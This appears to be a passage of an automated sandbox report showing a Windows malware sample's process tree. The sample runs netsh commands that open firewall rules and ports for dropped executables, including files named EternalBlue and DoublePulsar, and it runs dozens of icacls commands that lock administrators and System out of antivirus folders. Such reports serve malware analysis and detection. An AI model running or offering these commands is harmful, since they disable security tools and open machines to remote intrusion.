C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5276
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes3⤵PID:5616
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3448
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes3⤵PID:1584
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3272
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes3⤵PID:4044
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3528
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes3⤵PID:1836
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:424
-
-
-
  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 5192)
    command line: C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
    C:\Windows\SysWOW64\netsh.exe  (depth 4, PID 652)
      command line: netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
      - Modifies Windows Firewall
      - Event Triggered Execution: Netsh Helper DLL
      - System Location Discovery: System Language Discovery

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 5984)
    command line: C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
    C:\Windows\SysWOW64\netsh.exe  (depth 4, PID 3884)
      command line: netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
      - Modifies Windows Firewall
      - Event Triggered Execution: Netsh Helper DLL

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 3208)
    command line: C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
    C:\Windows\SysWOW64\netsh.exe  (depth 4, PID 5676)
      command line: netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
      - Modifies Windows Firewall
      - Event Triggered Execution: Netsh Helper DLL

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 4152)
    command line: C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
    C:\Windows\SysWOW64\netsh.exe  (depth 4, PID 4468)
      command line: netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
      - Modifies Windows Firewall
      - Event Triggered Execution: Netsh Helper DLL

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 5060)
    command line: C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
    C:\Windows\SysWOW64\netsh.exe  (depth 4, PID 3720)
      command line: netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
      - Modifies Windows Firewall
      - Event Triggered Execution: Netsh Helper DLL
      - System Location Discovery: System Language Discovery

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 2800)
    command line: C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
    - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\netsh.exe  (depth 4, PID 1616)
      command line: netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
      - Modifies Windows Firewall
      - Event Triggered Execution: Netsh Helper DLL

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 1572)
    command line: C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
    C:\Windows\SysWOW64\netsh.exe  (depth 4, PID 5308)
      command line: netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
      - Modifies Windows Firewall
      - Event Triggered Execution: Netsh Helper DLL

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 5992)
    command line: C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
    C:\Windows\SysWOW64\netsh.exe  (depth 4, PID 2416)
      command line: netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
      - Modifies Windows Firewall
      - Event Triggered Execution: Netsh Helper DLL

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 916)
    command line: C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
    - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\netsh.exe  (depth 4, PID 2220)
      command line: netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
      - Modifies Windows Firewall
      - Event Triggered Execution: Netsh Helper DLL
      - System Location Discovery: System Language Discovery

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 3256)
    command line: C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
    C:\Windows\SysWOW64\netsh.exe  (depth 4, PID 1436)
      command line: netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
      - Modifies Windows Firewall
      - Event Triggered Execution: Netsh Helper DLL

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 3500)
    command line: C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
    C:\Windows\SysWOW64\netsh.exe  (depth 4, PID 5016)
      command line: netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
      - Modifies Windows Firewall
      - Event Triggered Execution: Netsh Helper DLL
      - System Location Discovery: System Language Discovery

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 1584)
    command line: C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
    C:\Windows\SysWOW64\netsh.exe  (depth 4, PID 5572)
      command line: netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
      - Modifies Windows Firewall
      - Event Triggered Execution: Netsh Helper DLL
      - System Location Discovery: System Language Discovery
  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 4464)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 1016)
      command line: icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 4044)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 1836)
      command line: icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
      - Modifies file permissions
      - System Location Discovery: System Language Discovery

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 1752)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
    - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 4468)
      command line: icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
      - Modifies file permissions
      - System Location Discovery: System Language Discovery

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 2460)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 2092)
      command line: icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 5088)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 4820)
      command line: icacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 4596)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 4668)
      command line: icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 5980)
    command line: C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 5036)
      command line: icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 6064)
    command line: C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 4976)
      command line: icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 2300)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 5496)
      command line: icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 3896)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 3084)
      command line: icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 264)
    command line: C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
    - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 2084)
      command line: icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 4992)
    command line: C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 5852)
      command line: icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 5568)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 2388)
      command line: icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)
      - Modifies file permissions
      - System Location Discovery: System Language Discovery

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 1216)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 5196)
      command line: icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 1880)
    command line: C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 6116)
      command line: icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 1096)
    command line: C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
    - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 5320)
      command line: icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
      - Modifies file permissions
      - System Location Discovery: System Language Discovery

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 5172)
    command line: C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 3256)
      command line: icacls c:\programdata\Malwarebytes /deny Admin:(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 5404)
    command line: C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 4016)
      command line: icacls c:\programdata\Malwarebytes /deny System:(F)
      - Modifies file permissions
      - System Location Discovery: System Language Discovery

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 3976)
    command line: C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 5600)
      command line: icacls C:\Programdata\MB3Install /deny Admin:(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 844)
    command line: C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 520)
      command line: icacls C:\Programdata\MB3Install /deny System:(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 1836)
    command line: C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 4668)
      command line: icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 5956)
    command line: C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 2256)
      command line: icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
      - Modifies file permissions
      - System Location Discovery: System Language Discovery

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 4736)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)
    - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 4872)
      command line: icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 4588)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 5112)
      command line: icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 5088)
    command line: C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 3252)
      command line: icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 4268)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
    - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 3692)
      command line: icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 5324)
    command line: C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 5480)
      command line: icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 5360)
    command line: C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 2416)
      command line: icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 5568)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 1632)
      command line: icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 5456)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 4052)
      command line: icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
      - Modifies file permissions
      - System Location Discovery: System Language Discovery

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 3256)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 5396)
      command line: icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
      - Modifies file permissions
      - System Location Discovery: System Language Discovery

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 1016)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 1748)
      command line: icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 1404)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
    - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 3920)
      command line: icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 3884)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 3044)
      command line: icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 5980)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 3412)
      command line: icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 3600)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 5476)
      command line: icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
      - Modifies file permissions
      - System Location Discovery: System Language Discovery

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 1360)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 916)
      command line: icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
      - Modifies file permissions
      - System Location Discovery: System Language Discovery

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 5624)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 5972)
      command line: icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 5036)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 5312)
      command line: icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
      - Modifies file permissions
      - System Location Discovery: System Language Discovery

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 4344)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 3312)
      command line: icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 4524)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 4756)
      command line: icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 4908)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 5556)
      command line: icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 3192)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 3712)
      command line: icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 3276)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 2460)
      command line: icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 6016)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 5268)
      command line: icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
      - Modifies file permissions
      - System Location Discovery: System Language Discovery

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 5600)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 4920)
      command line: icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 4512)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 220)
      command line: icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 3932)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 4908)
      command line: icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 2784)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 5644)
      command line: icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 4752)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
    C:\Windows\System32\Conhost.exe  (depth 4, PID 6016)
      command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 668)
      command line: icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 3228)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 2256)
      command line: icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 3528)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
    C:\Windows\System32\Conhost.exe  (depth 4, PID 4872)
      command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 5696)
      command line: icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
      - Modifies file permissions
      - System Location Discovery: System Language Discovery

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 520)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 3464)
      command line: icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 1008)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
    - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 1164)
      command line: icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
      - Modifies file permissions
      - System Location Discovery: System Language Discovery

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 5060)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 5688)
      command line: icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 3724)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
    - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 5644)
      command line: icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
